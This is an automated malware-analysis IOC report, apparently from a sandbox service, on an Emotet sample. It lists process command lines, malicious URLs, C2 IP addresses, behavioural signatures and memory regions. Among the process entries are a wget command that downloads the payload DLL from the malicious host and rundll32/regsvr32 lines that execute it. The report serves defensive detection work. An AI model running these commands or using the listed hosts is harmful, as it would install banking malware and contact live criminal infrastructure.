Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

C:\Windows\System32\loaddll64.exe

loaddll64.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll"

C:\Windows\System32\regsvr32.exe

regsvr32.exe /s C:\Users\user\Desktop\download\NjszMzh0ar.dll

C:\Windows\System32\rundll32.exe

rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1

C:\Windows\System32\rundll32.exe

rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,AOBplENEwxGsLJOHWaHDTizor

C:\Windows\System32\regsvr32.exe

C:\Windows\system32\regsvr32.exe "C:\Windows\system32\QKXGFEEVVr\VycaGa.dll"

C:\Windows\System32\rundll32.exe

rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,BSUOlvQdFaMbSsYDjgkGG

C:\Windows\System32\rundll32.exe

rundll32.exe C:\Users\user\Desktop\download\NjszMzh0ar.dll,DllRegisterServer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/" > cmdline.out 2>&1

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\wget.exe

wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/"

C:\Windows\System32\cmd.exe

cmd.exe /C rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p

There are 4 hidden processes, click here to show them.

URLs

Name

Malicious

http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV

Details

Filetype:	URL
Filename:	http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV

Signature Hits	Behavior Group	Mitre Attack
	E-Banking Fraud, Stealing of Sensitive Information
Multi AV Scanner detection for submitted file	AV Detection
Antivirus / Scanner detection for submitted sample	AV Detection
Yara detected Emotet	E-Banking Fraud, Stealing of Sensitive Information
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Security Software Discovery
Antivirus detection for URL or domain	AV Detection
Multi AV Scanner detection for dropped file	AV Detection
Snort IDS alert for network traffic	Networking
DLL side loading technique detected	HIPS / PFW / Operating System Protection Evasion	Virtualization/Sandbox Evasion Security Software Discovery
C2 URLs / IPs found in malware configuration	Networking	Security Software Discovery
Hides that the sample has been downloaded from the Internet (zone.identifier)	Hooking and other Techniques for Hiding and Protection	Hidden Files and Directories Security Software Discovery
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection
Contains functionality to check if a debugger is running (IsDebuggerPresent)	Anti Debugging	Security Software Discovery
Contains functionality to query locales information (e.g. system language)	Language, Device and Operating System Detection	System Information Discovery
Deletes files inside the Windows folder	System Summary	File Deletion
Uses code obfuscation techniques (call, push, ret)	Data Obfuscation	Obfuscated Files or Information Security Software Discovery
Creates files inside the system directory	System Summary
PE file contains sections with non-standard names	Data Obfuscation	File Deletion
Detected potential crypto function	System Summary	Process Discovery Archive Collected Data Encrypted Channel
Contains functionality to query CPU information (cpuid)	Language, Device and Operating System Detection
Found potential string decryption / allocating functions	System Summary	Deobfuscate/Decode Files or Information
HTTP GET or POST without a user agent	Networking
Contains functionality which may be used to detect a debugger (GetProcessHeap)	Anti Debugging	Security Software Discovery
Downloads executable code via HTTP	Networking	Security Software Discovery
Drops PE files	Persistence and Installation Behavior
Tries to load missing DLLs	System Summary	DLL Side-Loading
Drops PE files to the windows directory (C:\Windows)	Persistence and Installation Behavior	Masquerading
Checks if the current process is being debugged	Anti Debugging	Virtualization/Sandbox Evasion Security Software Discovery
Registers a DLL	Data Obfuscation	Regsvr32
Found large amount of non-executed APIs	Malware Analysis System Evasion
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion
Queries a list of all running processes	Malware Analysis System Evasion
Found malware configuration	AV Detection
Reads software policies	System Summary
Contains functionality to enumerate / list files inside a directory	Spreading, Malware Analysis System Evasion
Queries the cryptographic machine GUID	Language, Device and Operating System Detection
Uses HTTPS	Networking	Security Software Discovery
Spawns processes	System Summary	Process Injection
Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Uses an in-process (OLE) Automation server	System Summary
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)	Networking
Creates files inside the user directory	System Summary
Contains functionality to query local / system time	Language, Device and Operating System Detection	System Time Discovery
Classification label	System Summary
Disables application error messsages (SetErrorMode)	Hooking and other Techniques for Hiding and Protection
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior		Security Software Discovery
Reads ini files	System Summary	File and Directory Discovery
Contains functionality to enum processes or threads	System Summary	Process Discovery
Runs a DLL by calling functions	System Summary	Rundll32
Connects to IPs without corresponding DNS lookups	Networking
Creates mutexes	System Summary
Contains functionality to register its own exception handler	Anti Debugging	Security Software Discovery
Checks the free space of harddrives	Malware Analysis System Evasion
URLs found in memory or binary data	Networking
Performs DNS lookups	Networking	Security Software Discovery Non-Application Layer Protocol Application Layer Protocol
Contains functionality to download additional files from the internet	Networking
Downloads files from webservers via HTTP	Networking	Ingress Tool Transfer
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion	Security Software Discovery
Reads the hosts file	System Summary	Remote System Discovery
Uses secure TLS version for HTTPS connections	Compliance, Networking
Found graphical window changes (likely an installer)	System Summary
Found GUI installer (many successful clicks)	System Summary	Virtualization/Sandbox Evasion Security Software Discovery

http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8

unknown

Details

Name:	http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8
TargetID:	2
From Memory:	true
Current Path:	C:\Windows\SysWOW64\wget.exe
Source:	wget.exe, 00000002.00000002.382757981.0000000001195000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Antivirus detection for URL or domain	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
URLs found in memory or binary data	Networking

https://45.55.191.130/

45.55.191.130

Details

Name:	https://45.55.191.130/
IP:	45.55.191.130
TargetID:	8
From Memory:	false
Current Path:	C:\Windows\System32\regsvr32.exe
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Snort IDS alert for network traffic	Networking
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

https://213.239.212.5/

213.239.212.5

Details

Name:	https://213.239.212.5/
IP:	213.239.212.5
TargetID:	8
From Memory:	false
Current Path:	C:\Windows\System32\regsvr32.exe
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Antivirus detection for URL or domain	AV Detection
Snort IDS alert for network traffic	Networking
System process connects to network (likely due to code injection or exploit)	Networking, HIPS / PFW / Operating System Protection Evasion	Process Injection
HTTP GET or POST without a user agent	Networking
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/

112.175.184.78

Details

Name:	http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/
IP:	112.175.184.78
TargetID:	2
From Memory:	false
Current Path:	C:\Windows\SysWOW64\wget.exe
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Antivirus detection for URL or domain	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

https://213.239.212.5/D

unknown

Details

Name:	https://213.239.212.5/D
TargetID:	8
From Memory:	true
Current Path:	C:\Windows\System32\regsvr32.exe
Source:	regsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
Antivirus detection for URL or domain	AV Detection
URLs found in memory or binary data	Networking

https://45.55.191.130/%I:

unknown

Details

Name:	https://45.55.191.130/%I:
TargetID:	8
From Memory:	true
Current Path:	C:\Windows\System32\regsvr32.exe
Source:	regsvr32.exe, 00000008.00000003.471389369.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.467241295.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649762809.000000000063F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471509754.000000000063D000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
Antivirus detection for URL or domain	AV Detection
URLs found in memory or binary data	Networking

https://45.55.191.130/;

unknown

Details

Name:	https://45.55.191.130/;
TargetID:	8
From Memory:	true
Current Path:	C:\Windows\System32\regsvr32.exe
Source:	regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmp

Signature Hits	Behavior Group	Mitre Attack
Antivirus detection for URL or domain	AV Detection
URLs found in memory or binary data	Networking

Domains

Name

Malicious

clotizen.dothome.co.kr

112.175.184.78

Details

Name:	clotizen.dothome.co.kr
IP:	112.175.184.78
TargetID:	2
Current Path:	C:\Windows\SysWOW64\wget.exe
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

112.194.0.0

unknown

China

80.100.90.0

unknown

Netherlands

192.3.0.0

unknown

United States

74.211.2.0

unknown

United States

45.55.191.130

unknown

United States

213.239.212.5

unknown

Germany

4.4.0.0

unknown

United States

232.3.0.0

unknown

Reserved

208.109.90.0

unknown

United States

222.94.0.0

unknown

China

20.4.0.0

unknown

United States

215.219.2.0

unknown

United States

68.211.2.0

unknown

United States

208.100.90.0

unknown

United States

16.101.90.0

unknown

United States

70.211.2.0

unknown

United States

32.4.0.0

unknown

United States

67.211.2.0

unknown

United States

4.1.0.0

unknown

United States

36.4.0.0

unknown

China

236.3.0.0

unknown

Reserved

16.4.0.0

unknown

United States

96.92.0.0

unknown

United States

208.99.90.0

unknown

United States

56.211.2.0

unknown

United States

72.211.2.0

unknown

United States

16.100.90.0

unknown

United States

112.175.184.78

clotizen.dothome.co.kr

Korea Republic of

192.168.2.1

unknown

There are 19 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

292F30B0000

direct allocation

page execute and read and write

14A0000

direct allocation

page execute and read and write

491000

direct allocation

page execute read

1EA80041000

direct allocation

page execute read

1EA80010000

direct allocation

page execute and read and write

14D1000

direct allocation

page execute read

450000

direct allocation

page execute and read and write

578000

heap

page read and write

292F30E1000

direct allocation

page execute read

B3E000

stack

page read and write

5026DF9000

stack

page read and write

14D0000

direct allocation

page read and write

1EAA3500000

trusted library allocation

page read and write

1D0000

heap

page read and write

24833502000

heap

page read and write

1EAA25FD000

heap

page read and write

1FBD6428000

heap

page read and write

2B33CDD0000

heap

page read and write

9259DFF000

stack

page read and write

1EAA2450000

heap

page read and write

23018E63000

heap

page read and write

2EA0000

heap

page read and write

2483345E000

heap

page read and write

1E0000

trusted library allocation

page read and write

23018D60000

heap

page read and write

65A000

heap

page read and write

21A28D80000

heap

page read and write

4B9000

direct allocation

page read and write

180001000

unkown

page execute read

1EAA3560000

trusted library allocation

page read and write

180061000

unkown

page read and write

1EAA2460000

trusted library allocation

page read and write

23018E5C000

heap

page read and write

1E90000

trusted library allocation

page read and write

2B339A48000

heap

page read and write

1B4F79BC000

heap

page read and write

1EAA2730000

trusted library allocation

page read and write

292F3065000

heap

page read and write

654000

heap

page read and write

BA3000

heap

page read and write

14FA000

direct allocation

page readonly

23018E5B000

heap

page read and write

550000

trusted library allocation

page read and write

292F310A000

direct allocation

page readonly

325C000

stack

page read and write

21A28CB0000

heap

page read and write

1FBD6413000

heap

page read and write

1EAA25FD000

heap

page read and write

23018F08000

heap

page read and write

B96000

heap

page read and write

560000

trusted library allocation

page read and write

23018E29000

heap

page read and write

292F3040000

heap

page read and write

1F57000

heap

page read and write

2B339A4C000

heap

page read and write

1B4F79CD000

heap

page read and write

1B4F79B2000

heap

page read and write

5B0000

heap

page read and write

1B4F79AD000

heap

page read and write

1EAFA600000

heap

page read and write

238E000

stack

page read and write

D64F57E000

stack

page read and write

1D0000

heap

page read and write

1EAA27A0000

trusted library allocation

page read and write

1EAA26B0000

heap

page read and write

44A9CDC000

stack

page read and write

1B4F79A9000

heap

page read and write

248D000

stack

page read and write

1EAA2621000

heap

page read and write

23018F00000

heap

page read and write

14F9000

direct allocation

page read and write

1B4F78B0000

heap

page read and write

1580000

heap

page read and write

1B4FAB40000

trusted library allocation

page read and write

98075FF000

stack

page read and write

2B339A42000

heap

page read and write

16B38BB000

stack

page read and write

21A28B70000

heap

page read and write

2B339BF0000

heap

page read and write

180000000

unkown

page readonly

98076FE000

stack

page read and write

65A000

heap

page read and write

1190000

heap

page read and write

5026FFF000

stack

page read and write

A50000

trusted library allocation

page read and write

1EA80040000

direct allocation

page read and write

2550000

heap

page read and write

1B4F7770000

heap

page read and write

F0000

remote allocation

page read and write

2DB0000

trusted library allocation

page read and write

292F3110000

heap

page readonly

1EAA25B0000

heap

page read and write

1B4F7C45000

heap

page read and write

7EB5000

heap

page read and write

1B4F79AD000

heap

page read and write

292F49D9000

heap

page read and write

12B0000

direct allocation

page execute and read and write

180061000

unkown

page read and write

98072FB000

stack

page read and write

5DB000

heap

page read and write

2483345C000

heap

page read and write

2DAF000

stack

page read and write

24833480000

heap

page read and write

1275000

stack

page read and write

5B0000

heap

page read and write

1B4F7C40000

heap

page read and write

1FBD6440000

heap

page read and write

23018F02000

heap

page read and write

292F3137000

heap

page read and write

180064000

unkown

page readonly

1B4F7950000

heap

page read and write

1FBD6C02000

trusted library allocation

page read and write

F50000

heap

page read and write

23018E52000

heap

page read and write

9806E9C000

stack

page read and write

1EA80000000

direct allocation

page execute and read and write

400000

heap

page read and write

5026D7F000

stack

page read and write

307F000

stack

page read and write

1B4F79A9000

heap

page read and write

2B339A65000

heap

page read and write

31BBCFD000

stack

page read and write

1FBD6502000

heap

page read and write

14F8000

direct allocation

page readonly

23018F13000

heap

page read and write

1FBD6500000

heap

page read and write

292F30E0000

direct allocation

page read and write

23018E13000

heap

page read and write

9259AFE000

stack

page read and write

639000

heap

page read and write

24833452000

heap

page read and write

23018DF0000

trusted library allocation

page read and write

9259FFE000

stack

page read and write

1EAA32A0000

trusted library allocation

page read and write

AFE000

stack

page read and write

16B39BF000

stack

page read and write

605000

heap

page read and write

9CC000

stack

page read and write

607000

heap

page read and write

24B0000

remote allocation

page read and write

44A9D5F000

stack

page read and write

2B339A39000

heap

page read and write

24833320000

trusted library allocation

page read and write

1B4F7C30000

heap

page read and write

AFBAD1F000

stack

page read and write

605000

heap

page read and write

570000

heap

page read and write

180064000

unkown

page readonly

4BA000

direct allocation

page readonly

24833413000

heap

page read and write

23018E7C000

heap

page read and write

1FBD6513000

heap

page read and write

1EAA2720000

trusted library allocation

page read and write

1EAA25B7000

heap

page read and write

292F30A0000

direct allocation

page execute and read and write

2E90000

heap

page read and write

A0E000

stack

page read and write

50269DB000

stack

page read and write

292F3108000

direct allocation

page readonly

B70000

heap

page read and write

2B339C2B000

heap

page read and write

24833480000

heap

page read and write

A80000

heap

page read and write

180051000

unkown

page readonly

24833C02000

trusted library allocation

page read and write

106F000

stack

page read and write

2B339990000

heap

page read and write

639000

heap

page read and write

98074F7000

stack

page read and write

12DB000

heap

page read and write

2B339A36000

heap

page read and write

180001000

unkown

page execute read

1B4F79B2000

heap

page read and write

23018D50000

heap

page read and write

1FBD6260000

heap

page read and write

1EAFA6A0000

heap

page read and write

2B339C25000

heap

page read and write

2483345D000

heap

page read and write

2B339A00000

heap

page read and write

F0000

remote allocation

page read and write

16B3C7F000

stack

page read and write

292F3020000

heap

page read and write

639000

heap

page read and write

21A28D88000

heap

page read and write

23018E7D000

heap

page read and write

1EAFA8E5000

heap

page read and write

1B4F7997000

heap

page read and write

2483343C000

heap

page read and write

1EAA25FD000

heap

page read and write

292F3130000

heap

page read and write

292FA937000

heap

page read and write

1374000

heap

page read and write

24833513000

heap

page read and write

602000

heap

page read and write

180051000

unkown

page readonly

FE0000

heap

page read and write

1EAA3290000

trusted library allocation

page read and write

5026CFE000

stack

page read and write

B78000

heap

page read and write

1EAA34F0000

heap

page readonly

24833400000

heap

page read and write

AFBAD9F000

stack

page read and write

D64F5FF000

stack

page read and write

440000

direct allocation

page execute and read and write

1EA85F65000

heap

page read and write

A5F00FF000

stack

page read and write

24833482000

heap

page read and write

1EAA34E0000

trusted library allocation

page read and write

653000

heap

page read and write

5026EFF000

stack

page read and write

2B339C20000

heap

page read and write

23019802000

trusted library allocation

page read and write

480000

heap

page read and write

9806F1F000

stack

page read and write

1B4F79C1000

heap

page read and write

63F000

heap

page read and write

A60000

heap

page read and write

1335000

heap

page read and write

490000

direct allocation

page read and write

1FBD6402000

heap

page read and write

1EAA25F5000

heap

page read and write

24B0000

remote allocation

page read and write

1B4F7990000

heap

page read and write

CA000

stack

page read and write

2B339A2E000

heap

page read and write

24B0000

remote allocation

page read and write

1FBD646A000

heap

page read and write

2E5E000

stack

page read and write

2483348B000

heap

page read and write

E6F000

stack

page read and write

1B4F79B8000

heap

page read and write

1B4F78D0000

heap

page read and write

1EA80070000

heap

page readonly

44A9DDF000

stack

page read and write

24833429000

heap

page read and write

1B4F7C4B000

heap

page read and write

1EA80007000

heap

page read and write

2B339A4C000

heap

page read and write

1B4F79BC000

heap

page read and write

2B33CDD3000

heap

page read and write

2B339A3D000

heap

page read and write

1FBD63D0000

trusted library allocation

page read and write

1B4F79AD000

heap

page read and write

24833460000

heap

page read and write

FC0000

heap

page read and write

1195000

heap

page read and write

5DA000

heap

page read and write

2B33CDE0000

trusted library allocation

page read and write

23018E88000

heap

page read and write

292F2EE0000

heap

page read and write

24833402000

heap

page read and write

485000

heap

page read and write

1F40000

heap

page read and write

292F49F0000

heap

page read and write

5B0000

heap

page read and write

327F000

stack

page read and write

1B4FB340000

heap

page read and write

23018DC0000

heap

page read and write

2B339A20000

heap

page read and write

4B8000

direct allocation

page readonly

2B339A51000

heap

page read and write

23018E3C000

heap

page read and write

1FBD6465000

heap

page read and write

A5EFC7E000

stack

page read and write

24833500000

heap

page read and write

92597AC000

stack

page read and write

1EAFA4C0000

heap

page read and write

23018E00000

heap

page read and write

248331B0000

heap

page read and write

A5F01FF000

stack

page read and write

1B4F7C33000

heap

page read and write

2309000

stack

page read and write

292F313B000

heap

page read and write

9C000

stack

page read and write

A4E000

stack

page read and write

1EAA2790000

heap

page read and write

1EAFA8E0000

heap

page read and write

157E000

stack

page read and write

1EAA2590000

heap

page read and write

240F000

stack

page read and write

24833220000

heap

page read and write

63D000

heap

page read and write

1FBD6457000

heap

page read and write

B99000

heap

page read and write

A5EFEFB000

stack

page read and write

98073FB000

stack

page read and write

2B339A28000

heap

page read and write

5026F79000

stack

page read and write

180000000

unkown

page readonly

1B4F799B000

heap

page read and write

10000

heap

page read and write

5026E7B000

stack

page read and write

1FBD6476000

heap

page read and write

2B33B600000

heap

page read and write

248331C0000

heap

page read and write

2DB0000

trusted library allocation

page read and write

9259CFB000

stack

page read and write

1585000

heap

page read and write

336A000

stack

page read and write

9259EFB000

stack

page read and write

23018E7C000

heap

page read and write

A5EFFF7000

stack

page read and write

1EAA3510000

trusted library allocation

page read and write

24833508000

heap

page read and write

2B339A39000

heap

page read and write

AFBAC9C000

stack

page read and write

30000

heap

page read and write

1EAFA6A9000

heap

page read and write

1359000

heap

page read and write

A5EFCFE000

stack

page read and write

2B339A42000

heap

page read and write

9806F9F000

stack

page read and write

8DFE000

heap

page read and write

2B339A5D000

heap

page read and write

23018E67000

heap

page read and write

12D0000

heap

page read and write

292F3060000

heap

page read and write

16B393E000

stack

page read and write

1EA80068000

direct allocation

page readonly

1D6000

heap

page read and write

A5EF99C000

stack

page read and write

32EF000

stack

page read and write

1E90000

trusted library allocation

page read and write

4C0000

heap

page readonly

1FBD62D0000

heap

page read and write

1EAFA620000

heap

page read and write

252F000

stack

page read and write

D64F4FB000

stack

page read and write

1EA80130000

heap

page read and write

1EAA2799000

heap

page read and write

12C0000

heap

page readonly

1EA8006A000

direct allocation

page readonly

2B33D5E0000

heap

page read and write

1EAA2795000

heap

page read and write

1FBD6270000

heap

page read and write

1F0C000

stack

page read and write

1FBD6400000

heap

page read and write

There are 327 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reporthttp://clotizen.dothome.co.kr/members/lZTkIb3OkjcV

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV